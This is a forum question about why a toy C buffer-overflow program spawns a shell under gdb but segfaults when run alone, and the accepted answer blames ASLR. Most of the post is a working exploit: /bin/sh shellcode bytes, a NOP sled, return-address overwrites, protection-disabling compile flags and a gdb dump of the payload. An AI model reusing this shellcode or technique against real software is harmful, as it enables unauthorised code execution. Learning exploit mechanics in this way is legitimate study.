# Running shellcode works in debugger, but not by itself

Tags: c, shellcode

I'm experimenting with buffer overflows. I've written a toy example which does the following:

- building a buffer which consists of three parts:

1) a block with several "malicious" return addresses that overwrite the real return address on the stack;

2) NOP sled block the malicious return address is pointing into;

3) an actual shellcode that is known to be working

- Writing this buffer in a far too small buffer on the stack.

The interesting part is: when running in the shell, the program produces segmentation fault. However: running the same program with the debugger `gdb` works as expected. What can be the reason?

Code:

```
// gcc -g -m32 -z execstack -fno-stack-protector -o target_prog_dbg target_prog_dbg.c

#include <stdio.h>
#include <string.h>
#include <stdint.h>

typedef uint32_t INT; 

INT nop_sled_size = 64;
INT jmp_addr_size = 16;

INT* base_addr = 0xffffd024;

char shellcode[] = "\xeb\x02\xeb\15\xe8\xf9\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x5b\x31\xc0\x88\x43\x07\x89\x43\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80";

void make_exploit(char* exploit) { 

    int i;

    for (i = 0; i < jmp_addr_size; i++) 
        ((INT*)exploit)[i] = base_addr + nop_sled_size/2;

    memset(((INT*)exploit)+jmp_addr_size, 0x90, nop_sled_size*sizeof(INT));

    strcpy(exploit+sizeof(INT)*(jmp_addr_size + nop_sled_size), shellcode);

}


void run_exploit() {

    char buffer[16];

    int exploit_size = (nop_sled_size+jmp_addr_size)*sizeof(INT)+strlen(shellcode);

    char* exploit = (char*)malloc(exploit_size);

    make_exploit(exploit);

    memcpy(buffer, exploit, exploit_size);



}

int main () {

    run_exploit();

    return 0;    

}
```

Compiled with:

```
gcc -g -m32 -z execstack -fno-stack-protector -o target_prog_dbg target_prog_dbg.c
```

Buffer:

```
(gdb) x/x $ebp
0xffffd028:     0xffffd0a4

(gdb) x/100x buffer
0xffffd008:     0xffffd0a4      0xffffd0a4      0xffffd0a4      0xffffd0a4
0xffffd018:     0xffffd0a4      0xffffd0a4      0xffffd0a4      0xffffd0a4
0xffffd028:     0xffffd0a4      0xffffd0a4      0xffffd0a4      0xffffd0a4
0xffffd038:     0xffffd0a4      0xffffd0a4      0xffffd0a4      0xffffd0a4
0xffffd048:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd058:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd068:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd078:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd088:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd098:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0a8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0b8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0c8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0d8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0e8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0f8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd108:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd118:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd128:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd138:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd148:     0x0deb02eb      0xfffff9e8      0x69622fff      0x68732f6e
0xffffd158:     0x90909090      0x90909090      0xc0315b90      0x89074388
0xffffd168:     0x43890843      0x8d0bb00c      0x538d084b      0xff80cd0c
```

Please note that the operating system is a 64-bit system.

Comment: a non-executable stack segment?

Comment: I have another example with the same shellcode (without buffer overflow, but executed from the stack) that works fine

Answer (score 0, accepted):

ASLR caused the effect. In `gdb` it seems like no ASLR is involved for whatever reason.